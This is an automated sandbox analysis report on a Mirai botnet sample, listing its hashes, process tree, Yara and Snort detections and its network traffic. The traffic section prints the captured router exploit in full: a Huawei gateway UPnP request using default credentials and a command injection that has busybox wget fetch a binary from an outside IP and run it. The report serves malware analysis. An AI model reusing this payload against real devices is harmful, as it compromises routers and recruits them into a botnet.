Play interactive tour

Edit tour

Linux Analysis Report Dy4UCGJRnG

Overview

General Information

Sample Name:	Dy4UCGJRnG
Analysis ID:	511941
MD5:	32167ecd41fd0a0a2cf1cf9db65b9e0e
SHA1:	b18653a994bfc98fbc6df17684cca4ac85a8cda3
SHA256:	404afa3c5ce562b339afd7e02b561168ec15a4baccdca22deb34024e969b6ef2
Tags:	32elfmiraisparc
Infos:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Yara signature match

Sample has stripped symbol table

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	511941
Start date:	29.10.2021
Start time:	20:18:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 37s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Dy4UCGJRnG
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.troj.lin@0/0@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100 VT rate limit hit for: http://192.168.0.14:80/cgi-bin/ViewLog.asp

Process Tree

system is lnxubuntu20

Dy4UCGJRnG (PID: 5239, Parent: 5117, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/Dy4UCGJRnG

Dy4UCGJRnG New Fork (PID: 5241, Parent: 5239)

Dy4UCGJRnG New Fork (PID: 5242, Parent: 5239)

Dy4UCGJRnG New Fork (PID: 5244, Parent: 5242)

Dy4UCGJRnG New Fork (PID: 5246, Parent: 5242)

Dy4UCGJRnG New Fork (PID: 5247, Parent: 5242)

Dy4UCGJRnG New Fork (PID: 5248, Parent: 5242)

Dy4UCGJRnG New Fork (PID: 5252, Parent: 5242)

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Dy4UCGJRnG	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x12fb8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13028:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13098:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13108:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13178:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x133f8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x134a8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13500:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13558:$xo1: oMXKNNC\x0D\x17\x0C\x12
Dy4UCGJRnG	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5239.1.0000000060226c23.0000000052bc6aaf.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x298:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x30c:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x380:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x3f4:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x468:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x6e8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x740:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x798:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x7f0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x848:$xo1: oMXKNNC\x0D\x17\x0C\x12
5241.1.0000000060226c23.0000000052bc6aaf.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x298:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x30c:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x380:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x3f4:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x468:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x6e8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x740:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x798:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x7f0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x848:$xo1: oMXKNNC\x0D\x17\x0C\x12
5248.1.0000000060226c23.0000000052bc6aaf.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x298:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x30c:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x380:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x3f4:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x468:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x6e8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x740:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x798:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x7f0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x848:$xo1: oMXKNNC\x0D\x17\x0C\x12
5241.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x12fb8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13028:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13098:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13108:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13178:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x133f8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x134a8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13500:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13558:$xo1: oMXKNNC\x0D\x17\x0C\x12
5241.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x12fb8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13028:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13098:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13108:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13178:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x133f8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x134a8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13500:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13558:$xo1: oMXKNNC\x0D\x17\x0C\x12
5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5248.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x12fb8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13028:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13098:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13108:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13178:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x133f8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x134a8:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13500:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x13558:$xo1: oMXKNNC\x0D\x17\x0C\x12
5248.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 4 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Dy4UCGJRnG	Virustotal: Detection: 46%			Perma Link
Source: Dy4UCGJRnG	ReversingLabs: Detection: 56%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.103.126.19:8080 -> 192.168.2.23:54610
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.46.160.168:8080 -> 192.168.2.23:36954
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.112.167:80 -> 192.168.2.23:45934
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.251.138:80 -> 192.168.2.23:44380
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.251.203:80 -> 192.168.2.23:50044
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.223.68:80 -> 192.168.2.23:45810
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.120.210:80 -> 192.168.2.23:52498
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.61.90:8080 -> 192.168.2.23:47826
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.102.150:8080 -> 192.168.2.23:34976
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.103.176.61:8080 -> 192.168.2.23:46446
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.65.136:80 -> 192.168.2.23:59962
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.179.93:80 -> 192.168.2.23:41014
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.198.22:80 -> 192.168.2.23:33912
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.35.100:8080 -> 192.168.2.23:38520
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.193.114:8080 -> 192.168.2.23:46650
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.141.69:80 -> 192.168.2.23:48334
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.178.130:80 -> 192.168.2.23:40598
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.16.185:80 -> 192.168.2.23:55726
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.16.185:80 -> 192.168.2.23:55736
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 31.42.182.209:8080 -> 192.168.2.23:48912
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.16.185:80 -> 192.168.2.23:55802
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.103.176.192:8080 -> 192.168.2.23:35776
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.42.96:8080 -> 192.168.2.23:50494
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.101.246:80 -> 192.168.2.23:33862
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.95.59:80 -> 192.168.2.23:42424
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 85.209.138.181:8080 -> 192.168.2.23:42676
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.202.233:80 -> 192.168.2.23:45640
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.186.91:8080 -> 192.168.2.23:56378
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.199.199:80 -> 192.168.2.23:32948
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.193.37:8080 -> 192.168.2.23:42136
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.249.72:80 -> 192.168.2.23:51512
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.200.54:80 -> 192.168.2.23:54106
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.207.7:80 -> 192.168.2.23:45056
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.16.130:80 -> 192.168.2.23:52270
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.151.217:80 -> 192.168.2.23:47656
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.239.115:80 -> 192.168.2.23:50078
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.93.25:8080 -> 192.168.2.23:54110
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.59.172:8080 -> 192.168.2.23:39826
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.62.39:8080 -> 192.168.2.23:39382
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.87.19:8080 -> 192.168.2.23:60078
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 180.241.228.208:23 -> 192.168.2.23:51892
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.135.48:80 -> 192.168.2.23:58514
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.206.124:80 -> 192.168.2.23:54854
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.178.154:8080 -> 192.168.2.23:40342
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.142.130.66:8080 -> 192.168.2.23:60672
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.83.76:80 -> 192.168.2.23:54896
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.40.192:80 -> 192.168.2.23:55758
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.216.30:80 -> 192.168.2.23:39332
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.157.34:80 -> 192.168.2.23:34520
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.180.84:80 -> 192.168.2.23:54866
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.201.106:8080 -> 192.168.2.23:60160
Source: Traffic	Snort IDS: 477 ICMP Source Quench 89.174.19.44: -> 192.168.2.23:
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.153.189:80 -> 192.168.2.23:50030
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.205.200:80 -> 192.168.2.23:52134
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.214.241:80 -> 192.168.2.23:59070
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.235.77:23 -> 192.168.2.23:54312
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.13.187:80 -> 192.168.2.23:53850
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.180.170:80 -> 192.168.2.23:47958
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.135.36:8080 -> 192.168.2.23:41460
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.51.106:80 -> 192.168.2.23:56886
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 41.60.235.77:23 -> 192.168.2.23:54312
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.208.29.161:23 -> 192.168.2.23:52464
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.190.215:8080 -> 192.168.2.23:52034
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.101.214:8080 -> 192.168.2.23:42622
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.138.48:80 -> 192.168.2.23:33876
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.192.49:8080 -> 192.168.2.23:49546
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.178.98.43:23 -> 192.168.2.23:35630
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.178.98.43:23 -> 192.168.2.23:35630
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.233.7:80 -> 192.168.2.23:59088
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.235.77:23 -> 192.168.2.23:54630
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 85.229.187.0: -> 192.168.2.23:
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.63.245:80 -> 192.168.2.23:50206
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 62.182.33.49:8080 -> 192.168.2.23:47918
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 41.60.235.77:23 -> 192.168.2.23:54630
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.185.212:8080 -> 192.168.2.23:52222
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 31.40.227.97:8080 -> 192.168.2.23:51314
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.235.77:23 -> 192.168.2.23:54896
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.84.78:80 -> 192.168.2.23:50184
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.43.126:8080 -> 192.168.2.23:37812
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 41.60.235.77:23 -> 192.168.2.23:54896
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.23.172:80 -> 192.168.2.23:52404
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.222.198:8080 -> 192.168.2.23:48940
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 31.40.207.128:8080 -> 192.168.2.23:43226
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.235.77:23 -> 192.168.2.23:55142
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.152.96:80 -> 192.168.2.23:54668
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.71.162:80 -> 192.168.2.23:60836
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.4.74:80 -> 192.168.2.23:46778
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.177.142:80 -> 192.168.2.23:39228
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 41.60.235.77:23 -> 192.168.2.23:55142
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.44.254:8080 -> 192.168.2.23:49712
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.247.21:80 -> 192.168.2.23:37432
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.208.29.161:23 -> 192.168.2.23:53380
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.71.114:80 -> 192.168.2.23:34160
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.23.111:80 -> 192.168.2.23:49708
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.235.77:23 -> 192.168.2.23:55436
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.231.104:80 -> 192.168.2.23:37934
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 41.60.235.77:23 -> 192.168.2.23:55436
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.159.197:80 -> 192.168.2.23:55826
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.131.167:80 -> 192.168.2.23:46932
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.167.66:80 -> 192.168.2.23:60898
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.53.13:80 -> 192.168.2.23:55836
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 85.209.139.35:8080 -> 192.168.2.23:51946
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.144.58:80 -> 192.168.2.23:43382
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.178.98.43:23 -> 192.168.2.23:36850
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.178.98.43:23 -> 192.168.2.23:36850
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.235.77:23 -> 192.168.2.23:55762
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 62.182.32.220:8080 -> 192.168.2.23:32808
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.246.146:80 -> 192.168.2.23:45744
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.214.225:80 -> 192.168.2.23:58122
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.186.181:80 -> 192.168.2.23:42740
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 41.60.235.77:23 -> 192.168.2.23:55762
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.198.27:8080 -> 192.168.2.23:57448
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.198.27:8080 -> 192.168.2.23:57452
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.125.91:80 -> 192.168.2.23:36018
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.125.91:80 -> 192.168.2.23:36046
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.235.77:23 -> 192.168.2.23:56010

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56856
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56888
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56896
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56904
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56918
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56926
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56934
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56958
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56986
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 30 39 2e 31 34 31 2e 34 30 2e 31 30 30 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 209.141.40.100 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 30 39 2e 31 34 31 2e 34 30 2e 31 30 30 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 